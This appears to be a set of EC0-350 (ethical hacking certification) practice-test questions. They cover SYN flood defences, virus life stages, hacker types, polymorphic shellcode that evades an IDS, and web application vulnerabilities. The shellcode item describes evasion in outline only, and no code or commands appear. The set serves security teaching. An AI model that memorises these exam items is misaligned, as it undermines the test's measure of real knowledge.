EC0-350 Practice Test

The SYN flood attack sends TCP connections requests faster than a machine can process
them.
Attacker creates a random source address for each packet
SYN flag set in each packet is a request to open a new connection to the server
from the spoofed IP address
Victim responds to spoofed IP address, then waits for confirmation that never
arrives (timeout wait is about 3 minutes)
Victim's connection table fills up waiting for replies and ignores new connections
Legitimate users are ignored and will not be able to access the server
How do you protect your network against SYN Flood attacks?

A.

SYN cookies. Instead of allocating a record, send a SYN-ACK with a carefully
constructed sequence number generated as a hash of the clients IP address, port number,
and other information. When the client responds with a normal ACK, that special sequence
number will be included, which the server then verifies. Thus, the server first allocates
memory on the third packet of the handshake, not the first.

B.

RST cookies - The server sends a wrong SYN/ACK back to the client. The client should
then generate a RST packet telling the server that something is wrong. At this point, the
server knows the client is valid and will now accept incoming connections from that client
normally

C.

Check the incoming packet's IP address with the SPAM database on the Internet and
enable the filter using ACLs at the Firewall

D.

Stack Tweaking. TCP stacks can be tweaked in order to reduce the effect of SYN
floods. Reduce the timeout before a stack frees up the memory allocated for a connection
E. Micro Blocks. Instead of allocating a complete connection, simply allocate a micro record
of 16-bytes for the incoming SYN object

In what stage of Virus life does a stealth virus gets activated with the user performing
certain actions such as running an infected program?

A.

Design

B.

Elimination

C.

Incorporation

D.

Replication

E.

Launch

F.

Detection

Ursula is a college student at a University in Amsterdam. Ursula originally went to college
to study engineering but later changed to marine biology after spending a month at sea
with her friends. These friends frequently go out to sea to follow and harass fishing fleets
that illegally fish in foreign waters. Ursula eventually wants to put companies practicing
illegal fishing out of business. Ursula decides to hack into the parent company's computers
and destroy critical data knowing fully well that, if caught, she probably would be sent to jail
for a very long time. What would Ursula be considered?

A.

Ursula would be considered a gray hat since she is performing an act against illegal
activities.

B.

She would be considered a suicide hacker.

C.

She would be called a cracker.

D.

Ursula would be considered a black hat.

More sophisticated IDSs look for common shellcode signatures. But even these systems
can be bypassed, by using polymorphic shellcode. This is a technique common among
virus writers ?it basically hides the true nature of the shellcode in different disguises.
How does a polymorphic shellcode work?

A.

They encrypt the shellcode by XORing values over the shellcode, using loader code to
decrypt the shellcode, and then executing the decrypted shellcode

B.

They convert the shellcode into Unicode, using loader to convert back to machine code
then executing them

C.

They reverse the working instructions into opposite order by masking the IDS signatures

D.

They compress shellcode into normal instructions, uncompress the shellcode using
loader code and then executing the shellcode

Bret is a web application administrator and has just read that there are a number of
surprisingly common web application vulnerabilities that can be exploited by
unsophisticated attackers with easily available tools on the Internet. He has also read that
when an organization deploys a web application, they invite the world to send HTTP
requests. Attacks buried in these requests sail past firewalls, filters, platform hardening,
SSL, and IDS without notice because they are inside legal HTTP requests. Bret is
determined to weed out vulnerabilities.
What are some of the common vulnerabilities in web applications that he should be
concerned about?

A.

Non-validated parameters, broken access control, broken account and session
management, cross-site scripting and buffer overflows are just a few common
vulnerabilities

B.

Visible clear text passwords, anonymous user account set as default, missing latest
security patch, no firewall filters set and no SSL configured are just a few common
vulnerabilities

C.

No SSL configured, anonymous user account set as default, missing latest security
patch, no firewall filters set and an inattentive system administrator are just a few common
vulnerabilities

D.

No IDS configured, anonymous user account set as default, missing latest security
patch, no firewall filters set and visible clear text passwords are just a few common
vulnerabilities